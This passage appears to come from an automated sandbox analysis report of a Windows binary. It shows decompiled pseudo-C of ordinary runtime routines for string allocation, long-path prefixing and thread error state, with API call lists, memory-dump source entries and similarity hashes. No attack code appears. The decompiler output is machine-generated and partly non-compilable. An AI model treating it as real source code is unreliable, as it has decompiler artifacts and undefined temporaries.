                                                                                                										__eflags = _t202 - _t153;
                                                                                                										if(_t202 != _t153) {
                                                                                                											asm("o16 nop [eax+eax]");
                                                                                                											do {
                                                                                                												_t156 =  *_t202 & 0x0000ffff;
                                                                                                												__eflags = _t219;
                                                                                                												if(_t219 == 0) {
                                                                                                													L50:
                                                                                                													_v68 = 1;
                                                                                                												} else {
                                                                                                													__eflags =  *( *(_t219 + 0x20));
                                                                                                													if( *( *(_t219 + 0x20)) == 0) {
                                                                                                														L48:
                                                                                                														_t117 =  *((intOrPtr*)( *_t219 + 0xc))(_t156) & 0x0000ffff;
                                                                                                													} else {
                                                                                                														_t173 =  *(_t219 + 0x30);
                                                                                                														_t118 =  *_t173;
                                                                                                														__eflags = _t118;
                                                                                                														if(_t118 <= 0) {
                                                                                                															goto L48;
                                                                                                														} else {
                                                                                                															 *_t173 = _t118 - 1;
                                                                                                															_t174 =  *(_t219 + 0x20);
                                                                                                															_t190 =  *_t174;
                                                                                                															 *_t174 = _t190 + 2;
                                                                                                															_t117 = _t156;
                                                                                                															 *_t190 = _t156;
                                                                                                														}
                                                                                                													}
                                                                                                													__eflags = 0xffff - _t117;
                                                                                                													if(0xffff == _t117) {
                                                                                                														goto L50;
                                                                                                													}
                                                                                                												}
                                                                                                												_t202 =  &(_t202[1]);
                                                                                                												__eflags = _t202 - _v60;
                                                                                                											} while (_t202 != _v60);
                                                                                                											_t110 = _v68;
                                                                                                										}
                                                                                                										_t154 = _v76;
                                                                                                										 *_t154 = _t110;
                                                                                                										 *(_t154 + 4) = _t219;
                                                                                                										_v8 = 0xffffffff;
                                                                                                										E00F72D10( &_v56);
                                                                                                										 *[fs:0x0] = _v16;
                                                                                                										__eflags = _v20 ^ _t224;
                                                                                                										return E00F80D7F(_v20 ^ _t224, _t190);
                                                                                                									} else {
                                                                                                										_t12 = _t143 + 0x23; // 0x23
                                                                                                										_t223 = _t12 & 0xffffffe0;
                                                                                                										_v4 = _t143;
                                                                                                										L20:
                                                                                                										_t217[4] = _t152;
                                                                                                										_t217[5] = _t197;
                                                                                                										__eflags = _t152;
                                                                                                										if(_t152 != 0) {
                                                                                                											_t210 = _t223;
                                                                                                											_t182 = _t152 >> 1;
                                                                                                											__eflags = _t182;
                                                                                                											_t140 = memset(_t210, _a8 & 0x0000ffff | (_a8 & 0x0000ffff) << 0x00000010, _t182 << 2);
                                                                                                											_t211 = _t210 + _t182;
                                                                                                											asm("adc ecx, ecx");
                                                                                                											memset(_t211, _t140, 0);
                                                                                                											_t230 = _t230 + 0x18;
                                                                                                											_t197 = _t211;
                                                                                                										}
                                                                                                										 *((short*)(_t223 + _t152 * 2)) = 0;
                                                                                                										_t132 = _v4;
                                                                                                										__eflags = _t132 - 8;
                                                                                                										if(_t132 < 8) {
                                                                                                											L28:
                                                                                                											 *_t217 = _t223;
                                                                                                											return _t217;
                                                                                                										} else {
                                                                                                											_t180 =  *_t217;
                                                                                                											__eflags = 2 + _t132 * 2 - 0x1000;
                                                                                                											if(2 + _t132 * 2 < 0x1000) {
                                                                                                												L26:
                                                                                                												__eflags = _t180;
                                                                                                												if(_t180 != 0) {
                                                                                                													LocalFree(_t180);
                                                                                                												}
                                                                                                												goto L28;
                                                                                                											} else {
                                                                                                												_t190 =  *(_t180 - 4);
                                                                                                												_t160 = _t180 - _t190;
                                                                                                												_t24 = _t160 - 4; // 0x4
                                                                                                												__eflags = _t24 - 0x1f;
                                                                                                												if(__eflags > 0) {
                                                                                                													goto L31;
                                                                                                												} else {
                                                                                                													_t180 = _t190;
                                                                                                													goto L26;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t228 = __ecx;
                                                                                                					if(_t160 >= 8) {
                                                                                                						_t228 =  *__ecx;
                                                                                                					}
                                                                                                					_t217[4] = _t152;
                                                                                                					if(_t152 != 0) {
                                                                                                						_t213 = _t228;
                                                                                                						_t187 = _t152 >> 1;
                                                                                                						_t149 = memset(_t213, _a8 & 0x0000ffff | (_a8 & 0x0000ffff) << 0x00000010, _t187 << 2);
                                                                                                						asm("adc ecx, ecx");
                                                                                                						memset(_t213 + _t187, _t149, 0);
                                                                                                					}
                                                                                                					 *((short*)(_t228 + _t152 * 2)) = 0;
                                                                                                					return _t217;
                                                                                                				}
                                                                                                			}






































































                                                                                                0x00f79920
                                                                                                0x00f79920
                                                                                                0x00f79922
                                                                                                0x00f79926
                                                                                                0x00f79928
                                                                                                0x00f7992a
                                                                                                0x00f7992b
                                                                                                0x00f7992e
                                                                                                0x00f79934
                                                                                                0x00f79972
                                                                                                0x00f79978
                                                                                                0x00f79a71
                                                                                                0x00f79a71
                                                                                                0x00000000
                                                                                                0x00f7997e
                                                                                                0x00f79980
                                                                                                0x00f79983
                                                                                                0x00f79989
                                                                                                0x00f79999
                                                                                                0x00f7999d
                                                                                                0x00f7999f
                                                                                                0x00f799a8
                                                                                                0x00f799ab
                                                                                                0x00f799ad
                                                                                                0x00f799a1
                                                                                                0x00f799a1
                                                                                                0x00f799a1
                                                                                                0x00f7998b
                                                                                                0x00f7998b
                                                                                                0x00f7998b
                                                                                                0x00f799b0
                                                                                                0x00f799b0
                                                                                                0x00f799b3
                                                                                                0x00f799b8
                                                                                                0x00f79a6c
                                                                                                0x00f79a6c
                                                                                                0x00000000
                                                                                                0x00f799be
                                                                                                0x00f799be
                                                                                                0x00f799c0
                                                                                                0x00f799c5
                                                                                                0x00f799ee
                                                                                                0x00f799f0
                                                                                                0x00f799ff
                                                                                                0x00f799ff
                                                                                                0x00f799f2
                                                                                                0x00f799fb
                                                                                                0x00f799fb
                                                                                                0x00000000
                                                                                                0x00f799c7
                                                                                                0x00f799c7
                                                                                                0x00f799c7
                                                                                                0x00f799ca
                                                                                                0x00f799cc
                                                                                                0x00000000
                                                                                                0x00f799d2
                                                                                                0x00f799d5
                                                                                                0x00f799db
                                                                                                0x00f799dd
                                                                                                0x00f79a76
                                                                                                0x00f79a76
                                                                                                0x00f79a7b
                                                                                                0x00f79a7c
                                                                                                0x00f79a7d
                                                                                                0x00f79a7e
                                                                                                0x00f79a7f
                                                                                                0x00f79a80
                                                                                                0x00f79a81
                                                                                                0x00f79a83
                                                                                                0x00f79a85
                                                                                                0x00f79a90
                                                                                                0x00f79a91
                                                                                                0x00f79a94
                                                                                                0x00f79a99
                                                                                                0x00f79a9b
                                                                                                0x00f79a9e
                                                                                                0x00f79a9f
                                                                                                0x00f79aa0
                                                                                                0x00f79aa1
                                                                                                0x00f79aa5
                                                                                                0x00f79aab
                                                                                                0x00f79ab1
                                                                                                0x00f79ab9
                                                                                                0x00f79abf
                                                                                                0x00f79ac2
                                                                                                0x00f79ac8
                                                                                                0x00f79ace
                                                                                                0x00f79ad5
                                                                                                0x00f79adc
                                                                                                0x00f79ae1
                                                                                                0x00f79ae8
                                                                                                0x00f79aef
                                                                                                0x00f79af3
                                                                                                0x00f79af6
                                                                                                0x00f79af9
                                                                                                0x00f79afe
                                                                                                0x00f79b00
                                                                                                0x00f79b08
                                                                                                0x00f79b0a
                                                                                                0x00f79b0e
                                                                                                0x00f79b02
                                                                                                0x00f79b02
                                                                                                0x00f79b02
                                                                                                0x00f79b12
                                                                                                0x00f79b17
                                                                                                0x00f79b17
                                                                                                0x00f79b1c
                                                                                                0x00f79b21
                                                                                                0x00f79b23
                                                                                                0x00f79b51
                                                                                                0x00f79b53
                                                                                                0x00f79b54
                                                                                                0x00f79b5b
                                                                                                0x00f79b5e
                                                                                                0x00f79b5f
                                                                                                0x00f79b25
                                                                                                0x00f79b25
                                                                                                0x00f79b2b
                                                                                                0x00f79b2e
                                                                                                0x00f79b32
                                                                                                0x00f79b35
                                                                                                0x00f79b38
                                                                                                0x00f79b3a
                                                                                                0x00f79b40
                                                                                                0x00f79b40
                                                                                                0x00f79b42
                                                                                                0x00f79b44
                                                                                                0x00f79b46
                                                                                                0x00f79b46
                                                                                                0x00f79b46
                                                                                                0x00f79b4b
                                                                                                0x00f79b4b
                                                                                                0x00f79b6a
                                                                                                0x00f79b6e
                                                                                                0x00f79b85
                                                                                                0x00f79b87
                                                                                                0x00f79b8a
                                                                                                0x00f79b8c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f79b8e
                                                                                                0x00f79b8e
                                                                                                0x00f79b92
                                                                                                0x00f79b99
                                                                                                0x00f79b9c
                                                                                                0x00f79ba0
                                                                                                0x00f79ba3
                                                                                                0x00f79ba9
                                                                                                0x00f79bac
                                                                                                0x00f79bb0
                                                                                                0x00f79bb3
                                                                                                0x00f79bb6
                                                                                                0x00f79bb8
                                                                                                0x00f79bba
                                                                                                0x00f79bc0
                                                                                                0x00f79bc0
                                                                                                0x00f79bc3
                                                                                                0x00f79bc5
                                                                                                0x00f79c01
                                                                                                0x00f79c01
                                                                                                0x00f79bc7
                                                                                                0x00f79bca
                                                                                                0x00f79bcd
                                                                                                0x00f79bec
                                                                                                0x00f79bf4
                                                                                                0x00f79bcf
                                                                                                0x00f79bcf
                                                                                                0x00f79bd2
                                                                                                0x00f79bd4
                                                                                                0x00f79bd6
                                                                                                0x00000000
                                                                                                0x00f79bd8
                                                                                                0x00f79bd9
                                                                                                0x00f79bdb
                                                                                                0x00f79bde
                                                                                                0x00f79be3
                                                                                                0x00f79be5
                                                                                                0x00f79be7
                                                                                                0x00f79be7
                                                                                                0x00f79bd6
                                                                                                0x00f79bfc
                                                                                                0x00f79bff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f79bff
                                                                                                0x00f79c05
                                                                                                0x00f79c08
                                                                                                0x00f79c08
                                                                                                0x00f79c0d
                                                                                                0x00f79c0d
                                                                                                0x00f79c10
                                                                                                0x00f79c13
                                                                                                0x00f79c15
                                                                                                0x00f79c18
                                                                                                0x00f79c22
                                                                                                0x00f79c2c
                                                                                                0x00f79c3a
                                                                                                0x00f79c44
                                                                                                0x00f799e3
                                                                                                0x00f799e3
                                                                                                0x00f799e6
                                                                                                0x00f799e9
                                                                                                0x00f79a01
                                                                                                0x00f79a01
                                                                                                0x00f79a04
                                                                                                0x00f79a07
                                                                                                0x00f79a09
                                                                                                0x00f79a14
                                                                                                0x00f79a1d
                                                                                                0x00f79a1d
                                                                                                0x00f79a1f
                                                                                                0x00f79a1f
                                                                                                0x00f79a21
                                                                                                0x00f79a23
                                                                                                0x00f79a23
                                                                                                0x00f79a23
                                                                                                0x00f79a23
                                                                                                0x00f79a28
                                                                                                0x00f79a2d
                                                                                                0x00f79a31
                                                                                                0x00f79a34
                                                                                                0x00f79a60
                                                                                                0x00f79a61
                                                                                                0x00f79a69
                                                                                                0x00f79a36
                                                                                                0x00f79a36
                                                                                                0x00f79a3f
                                                                                                0x00f79a44
                                                                                                0x00f79a55
                                                                                                0x00f79a55
                                                                                                0x00f79a57
                                                                                                0x00f79a5a
                                                                                                0x00f79a5a
                                                                                                0x00000000
                                                                                                0x00f79a46
                                                                                                0x00f79a46
                                                                                                0x00f79a49
                                                                                                0x00f79a4b
                                                                                                0x00f79a4e
                                                                                                0x00f79a51
                                                                                                0x00000000
                                                                                                0x00f79a53
                                                                                                0x00f79a53
                                                                                                0x00000000
                                                                                                0x00f79a53
                                                                                                0x00f79a51
                                                                                                0x00f79a44
                                                                                                0x00f79a34
                                                                                                0x00f799dd
                                                                                                0x00f799cc
                                                                                                0x00f799c5
                                                                                                0x00f799b8
                                                                                                0x00f79936
                                                                                                0x00f79936
                                                                                                0x00f7993b
                                                                                                0x00f7993d
                                                                                                0x00f7993d
                                                                                                0x00f7993f
                                                                                                0x00f79944
                                                                                                0x00f7994f
                                                                                                0x00f79958
                                                                                                0x00f7995a
                                                                                                0x00f7995c
                                                                                                0x00f7995e
                                                                                                0x00f7995e
                                                                                                0x00f79963
                                                                                                0x00f7996f
                                                                                                0x00f7996f

                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 00F799D5
                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 00F799F5
                                                                                                • LocalFree.KERNEL32(00000008,?,?,?,?,?,00000000), ref: 00F79A5A
                                                                                                • __cftoe.LIBCMT ref: 00F79B80
                                                                                                  • Part of subcall function 00F71940: LocalAlloc.KERNEL32(00000040,80000022,00000000,?,?,?,?,?,?,?,?,?,FD8FA683,?), ref: 00F719BD
                                                                                                  • Part of subcall function 00F71940: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD8FA683,?), ref: 00F71A63
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Local$Alloc$Free$__cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 49843589-0
                                                                                                • Opcode ID: 88e1510c8df44a707a401fe1ffad9e41e66579367ebb331813f729d33cb94657
                                                                                                • Instruction ID: eddf7ea1b43a9eab04b8d7b95dcd4bf0727da775270f2acf26990daa71a79319
                                                                                                • Opcode Fuzzy Hash: 88e1510c8df44a707a401fe1ffad9e41e66579367ebb331813f729d33cb94657
                                                                                                • Instruction Fuzzy Hash: 9AA1C232A052099FDB14DF68D880AADB7F6FF88310F20862EE55AD7390EB759904DB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 53%
                                                                                                			E00F77E60(void* __ebx, void** __ecx, signed int __edi, void* __ebp, signed int _a4, intOrPtr _a20) {
                                                                                                				intOrPtr _v0;
                                                                                                				signed int _v4;
                                                                                                				void* __esi;
                                                                                                				signed int _t40;
                                                                                                				unsigned int _t42;
                                                                                                				void* _t43;
                                                                                                				void* _t44;
                                                                                                				long _t46;
                                                                                                				void* _t49;
                                                                                                				void* _t61;
                                                                                                				void** _t63;
                                                                                                				signed int _t72;
                                                                                                				signed int _t73;
                                                                                                				void* _t78;
                                                                                                				long _t79;
                                                                                                				signed int _t82;
                                                                                                				void* _t84;
                                                                                                				void* _t86;
                                                                                                				signed int _t89;
                                                                                                
                                                                                                				_t73 = __edi;
                                                                                                				_push(__ecx);
                                                                                                				_t72 = _a4;
                                                                                                				_t63 = __ecx;
                                                                                                				_t67 = 0x7ffffffe;
                                                                                                				_t78 =  *(__ecx + 0x10);
                                                                                                				_v4 = _t78;
                                                                                                				if(0x7ffffffe - _t78 < _t72) {
                                                                                                					L23:
                                                                                                					E00F71D00(_t63, _t67, _t73, _t78);
                                                                                                					goto L24;
                                                                                                				} else {
                                                                                                					_t40 = _t78 + _t72;
                                                                                                					_a4 = _t40;
                                                                                                					_t82 = _t40 | 0x00000007;
                                                                                                					_t89 =  *(__ecx + 0x14);
                                                                                                					if(_t82 <= 0x7ffffffe) {
                                                                                                						_t42 = _t89 >> 1;
                                                                                                						_t67 = 0x7ffffffe - _t42;
                                                                                                						__eflags = _t89 - _t67;
                                                                                                						if(__eflags <= 0) {
                                                                                                							_t43 = _t42 + _t89;
                                                                                                							__eflags = _t82 - _t43;
                                                                                                							_t78 =  <  ? _t43 : _t82;
                                                                                                						} else {
                                                                                                							_t78 = 0x7ffffffe;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t78 = 0x7ffffffe;
                                                                                                					}
                                                                                                					_t7 = _t78 + 1; // 0x7fffffff
                                                                                                					_t44 = _t7;
                                                                                                					_push(_t73);
                                                                                                					if(_t44 > 0x7fffffff) {
                                                                                                						L22:
                                                                                                						E00F72A40(_t63, _t72, _t73, _t89, __eflags);
                                                                                                						goto L23;
                                                                                                					} else {
                                                                                                						_t46 = _t44 + _t44;
                                                                                                						if(_t46 < 0x1000) {
                                                                                                							__eflags = _t46;
                                                                                                							if(_t46 == 0) {
                                                                                                								_t73 = 0;
                                                                                                								__eflags = 0;
                                                                                                							} else {
                                                                                                								_t73 = LocalAlloc(0x40, _t46);
                                                                                                							}
                                                                                                							goto L14;
                                                                                                						} else {
                                                                                                							_t8 = _t46 + 0x23; // 0x80000022
                                                                                                							_t67 = _t8;
                                                                                                							if(_t67 <= _t46) {
                                                                                                								goto L22;
                                                                                                							} else {
                                                                                                								_t61 = LocalAlloc(0x40, _t67);
                                                                                                								if(_t61 == 0) {
                                                                                                									L24:
                                                                                                									E00F98D9C(_t63, _t67, _t72, _t73, __eflags);
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									asm("int3");
                                                                                                									_push(_t78);
                                                                                                									_t79 = _t67;
                                                                                                									__eflags = 0;
                                                                                                									 *((intOrPtr*)(_t79 + 0x10)) = 0;
                                                                                                									 *((intOrPtr*)(_t79 + 0x14)) = 7;
                                                                                                									 *_t79 = 0;
                                                                                                									E00F71D10(_t63, _t67, _t73, _t79, _v4, _v0);
                                                                                                									return _t79;
                                                                                                								} else {
                                                                                                									_t9 = _t61 + 0x23; // 0x23
                                                                                                									_t73 = _t9 & 0xffffffe0;
                                                                                                									 *(_t73 - 4) = _t61;
                                                                                                									L14:
                                                                                                									_t63[4] = _a4;
                                                                                                									_t49 = _a20 + _a20;
                                                                                                									_t63[5] = _t78;
                                                                                                									_push(_t49);
                                                                                                									_push(L"\\\\?\\");
                                                                                                									_a4 = _t49 + _t73;
                                                                                                									_t84 = 2 + _v4 * 2;
                                                                                                									_push(_t73);
                                                                                                									if(_t89 < 8) {
                                                                                                										E00F96240();
                                                                                                										E00F96240(_a4, _t63, _t84);
                                                                                                										goto L21;
                                                                                                									} else {
                                                                                                										_t86 =  *_t63;
                                                                                                										E00F96240();
                                                                                                										E00F96240(_a4, _t86, 2 + _v4 * 2);
                                                                                                										if(2 + _t89 * 2 < 0x1000) {
                                                                                                											L18:
                                                                                                											if(_t86 == 0) {
                                                                                                												L21:
                                                                                                												 *_t63 = _t73;
                                                                                                												return _t63;
                                                                                                											} else {
                                                                                                												LocalFree(_t86);
                                                                                                												 *_t63 = _t73;
                                                                                                												return _t63;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t67 =  *(_t86 - 4);
                                                                                                											_t78 = _t86 - _t67;
                                                                                                											if(_t78 - 4 > 0x1f) {
                                                                                                												goto L24;
                                                                                                											} else {
                                                                                                												_t86 = _t67;
                                                                                                												goto L18;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}






















                                                                                                0x00f77e60
                                                                                                0x00f77e60
                                                                                                0x00f77e61
                                                                                                0x00f77e66
                                                                                                0x00f77e68
                                                                                                0x00f77e70
                                                                                                0x00f77e75
                                                                                                0x00f77e7b
                                                                                                0x00f77fa9
                                                                                                0x00f77fa9
                                                                                                0x00000000
                                                                                                0x00f77e81
                                                                                                0x00f77e81
                                                                                                0x00f77e86
                                                                                                0x00f77e8a
                                                                                                0x00f77e8e
                                                                                                0x00f77e93
                                                                                                0x00f77e9b
                                                                                                0x00f77e9d
                                                                                                0x00f77e9f
                                                                                                0x00f77ea1
                                                                                                0x00f77eaa
                                                                                                0x00f77eac
                                                                                                0x00f77eae
                                                                                                0x00f77ea3
                                                                                                0x00f77ea3
                                                                                                0x00f77ea3
                                                                                                0x00f77e95
                                                                                                0x00f77e95
                                                                                                0x00f77e95
                                                                                                0x00f77eb1
                                                                                                0x00f77eb1
                                                                                                0x00f77eb4
                                                                                                0x00f77eba
                                                                                                0x00f77fa4
                                                                                                0x00f77fa4
                                                                                                0x00000000
                                                                                                0x00f77ec0
                                                                                                0x00f77ec0
                                                                                                0x00f77ec7
                                                                                                0x00f77ef0
                                                                                                0x00f77ef2
                                                                                                0x00f77f01
                                                                                                0x00f77f01
                                                                                                0x00f77ef4
                                                                                                0x00f77efd
                                                                                                0x00f77efd
                                                                                                0x00000000
                                                                                                0x00f77ec9
                                                                                                0x00f77ec9
                                                                                                0x00f77ec9
                                                                                                0x00f77ece
                                                                                                0x00000000
                                                                                                0x00f77ed4
                                                                                                0x00f77ed7
                                                                                                0x00f77edf
                                                                                                0x00f77fae
                                                                                                0x00f77fae
                                                                                                0x00f77fb3
                                                                                                0x00f77fb4
                                                                                                0x00f77fb5
                                                                                                0x00f77fb6
                                                                                                0x00f77fb7
                                                                                                0x00f77fb8
                                                                                                0x00f77fb9
                                                                                                0x00f77fba
                                                                                                0x00f77fbb
                                                                                                0x00f77fbc
                                                                                                0x00f77fbd
                                                                                                0x00f77fbe
                                                                                                0x00f77fbf
                                                                                                0x00f77fc0
                                                                                                0x00f77fc5
                                                                                                0x00f77fc7
                                                                                                0x00f77fcd
                                                                                                0x00f77fd4
                                                                                                0x00f77fdb
                                                                                                0x00f77fde
                                                                                                0x00f77fe6
                                                                                                0x00f77ee5
                                                                                                0x00f77ee5
                                                                                                0x00f77ee8
                                                                                                0x00f77eeb
                                                                                                0x00f77f03
                                                                                                0x00f77f07
                                                                                                0x00f77f0e
                                                                                                0x00f77f10
                                                                                                0x00f77f17
                                                                                                0x00f77f18
                                                                                                0x00f77f20
                                                                                                0x00f77f24
                                                                                                0x00f77f2b
                                                                                                0x00f77f2f
                                                                                                0x00f77f85
                                                                                                0x00f77f90
                                                                                                0x00000000
                                                                                                0x00f77f31
                                                                                                0x00f77f31
                                                                                                0x00f77f33
                                                                                                0x00f77f49
                                                                                                0x00f77f5d
                                                                                                0x00f77f6e
                                                                                                0x00f77f70
                                                                                                0x00f77f98
                                                                                                0x00f77f98
                                                                                                0x00f77fa1
                                                                                                0x00f77f72
                                                                                                0x00f77f73
                                                                                                0x00f77f79
                                                                                                0x00f77f82
                                                                                                0x00f77f82
                                                                                                0x00f77f5f
                                                                                                0x00f77f5f
                                                                                                0x00f77f62
                                                                                                0x00f77f6a
                                                                                                0x00000000
                                                                                                0x00f77f6c
                                                                                                0x00f77f6c
                                                                                                0x00000000
                                                                                                0x00f77f6c
                                                                                                0x00f77f6a
                                                                                                0x00f77f5d
                                                                                                0x00f77f2f
                                                                                                0x00f77edf
                                                                                                0x00f77ece
                                                                                                0x00f77ec7
                                                                                                0x00f77eba

                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,?,?,?,00F77E4B,?,00000000), ref: 00F77ED7
                                                                                                • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,?,?,?,00F77E4B,?,00000000), ref: 00F77EF7
                                                                                                  • Part of subcall function 00F72A40: LocalAlloc.KERNEL32(00000040,00FCD7AF,00FCD78C,00FCD78C,00FD254C,FD8FA683,?,?,00FB55C3,000000FF), ref: 00F72A79
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,FD8FA683,FD8FA683,?), ref: 00F77F73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Local$Alloc$Free
                                                                                                • String ID: \\?\
                                                                                                • API String ID: 209276640-4282027825
                                                                                                • Opcode ID: bcd572fa999862cdd5a2547b5e00d881ae0c1aa21e8b9d86cb1bebf1938469c2
                                                                                                • Instruction ID: a32d2428012a8bf1ac7b18c74b309441b8030c652b9b81e4ccf59745865431e9
                                                                                                • Opcode Fuzzy Hash: bcd572fa999862cdd5a2547b5e00d881ae0c1aa21e8b9d86cb1bebf1938469c2
                                                                                                • Instruction Fuzzy Hash: 7741E2325183119FDB14AF28DC44A6AB7E9EF843A0F11466FF819D7251DB30DC04ABE2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E00FA5DF2(void* __ecx, void* __edx) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t2;
                                                                                                				long _t3;
                                                                                                				intOrPtr _t5;
                                                                                                				long _t6;
                                                                                                				intOrPtr _t9;
                                                                                                				long _t10;
                                                                                                				signed int _t39;
                                                                                                				signed int _t40;
                                                                                                				void* _t43;
                                                                                                				void* _t49;
                                                                                                				signed int _t51;
                                                                                                				signed int _t53;
                                                                                                				signed int _t54;
                                                                                                				long _t56;
                                                                                                				long _t60;
                                                                                                				long _t61;
                                                                                                				void* _t65;
                                                                                                
                                                                                                				_t49 = __edx;
                                                                                                				_t43 = __ecx;
                                                                                                				_t60 = GetLastError();
                                                                                                				_t2 =  *0xfcf0d0; // 0x6
                                                                                                				_t67 = _t2 - 0xffffffff;
                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                					L6:
                                                                                                					_t3 = E00FA7A02(__eflags, _t2, 0xffffffff);
                                                                                                					__eflags = _t3;
                                                                                                					if(_t3 == 0) {
                                                                                                						goto L3;
                                                                                                					} else {
                                                                                                						_t51 = E00FA905C(1, 0x364);
                                                                                                						_pop(_t43);
                                                                                                						__eflags = _t51;
                                                                                                						if(__eflags != 0) {
                                                                                                							__eflags = E00FA7A02(__eflags,  *0xfcf0d0, _t51);
                                                                                                							if(__eflags != 0) {
                                                                                                								E00FA5C1C(_t60, _t51, 0xfd10b4);
                                                                                                								E00FA609F(0);
                                                                                                								_t65 = _t65 + 0xc;
                                                                                                								goto L13;
                                                                                                							} else {
                                                                                                								_t39 = 0;
                                                                                                								E00FA7A02(__eflags,  *0xfcf0d0, 0);
                                                                                                								_push(_t51);
                                                                                                								goto L9;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t39 = 0;
                                                                                                							__eflags = 0;
                                                                                                							E00FA7A02(0,  *0xfcf0d0, 0);
                                                                                                							_push(0);
                                                                                                							L9:
                                                                                                							E00FA609F();
                                                                                                							_pop(_t43);
                                                                                                							goto L4;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t51 = E00FA79C3(_t67, _t2);
                                                                                                					if(_t51 == 0) {
                                                                                                						_t2 =  *0xfcf0d0; // 0x6
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						if(_t51 != 0xffffffff) {
                                                                                                							L13:
                                                                                                							_t39 = _t51;
                                                                                                						} else {
                                                                                                							L3:
                                                                                                							_t39 = 0;
                                                                                                							L4:
                                                                                                							_t51 = _t39;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				SetLastError(_t60);
                                                                                                				asm("sbb edi, edi");
                                                                                                				_t53 =  ~_t51 & _t39;
                                                                                                				if(_t53 == 0) {
                                                                                                					E00FA5942(_t39, _t43, _t49, _t53, _t60);
                                                                                                					asm("int3");
                                                                                                					_t5 =  *0xfcf0d0; // 0x6
                                                                                                					_push(_t60);
                                                                                                					__eflags = _t5 - 0xffffffff;
                                                                                                					if(__eflags == 0) {
                                                                                                						L22:
                                                                                                						_t6 = E00FA7A02(__eflags, _t5, 0xffffffff);
                                                                                                						__eflags = _t6;
                                                                                                						if(_t6 == 0) {
                                                                                                							goto L31;
                                                                                                						} else {
                                                                                                							_t60 = E00FA905C(1, 0x364);
                                                                                                							_pop(_t43);
                                                                                                							__eflags = _t60;
                                                                                                							if(__eflags != 0) {
                                                                                                								__eflags = E00FA7A02(__eflags,  *0xfcf0d0, _t60);
                                                                                                								if(__eflags != 0) {
                                                                                                									E00FA5C1C(_t60, _t60, 0xfd10b4);
                                                                                                									E00FA609F(0);
                                                                                                									_t65 = _t65 + 0xc;
                                                                                                									goto L29;
                                                                                                								} else {
                                                                                                									E00FA7A02(__eflags,  *0xfcf0d0, _t21);
                                                                                                									_push(_t60);
                                                                                                									goto L25;
                                                                                                								}
                                                                                                							} else {
                                                                                                								E00FA7A02(__eflags,  *0xfcf0d0, _t20);
                                                                                                								_push(_t60);
                                                                                                								L25:
                                                                                                								E00FA609F();
                                                                                                								_pop(_t43);
                                                                                                								goto L31;
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t60 = E00FA79C3(__eflags, _t5);
                                                                                                						__eflags = _t60;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t5 =  *0xfcf0d0; // 0x6
                                                                                                							goto L22;
                                                                                                						} else {
                                                                                                							__eflags = _t60 - 0xffffffff;
                                                                                                							if(_t60 == 0xffffffff) {
                                                                                                								L31:
                                                                                                								E00FA5942(_t39, _t43, _t49, _t53, _t60);
                                                                                                								asm("int3");
                                                                                                								_push(_t39);
                                                                                                								_push(_t60);
                                                                                                								_push(_t53);
                                                                                                								_t61 = GetLastError();
                                                                                                								_t9 =  *0xfcf0d0; // 0x6
                                                                                                								__eflags = _t9 - 0xffffffff;
                                                                                                								if(__eflags == 0) {
                                                                                                									L38:
                                                                                                									_t10 = E00FA7A02(__eflags, _t9, 0xffffffff);
                                                                                                									__eflags = _t10;
                                                                                                									if(_t10 == 0) {
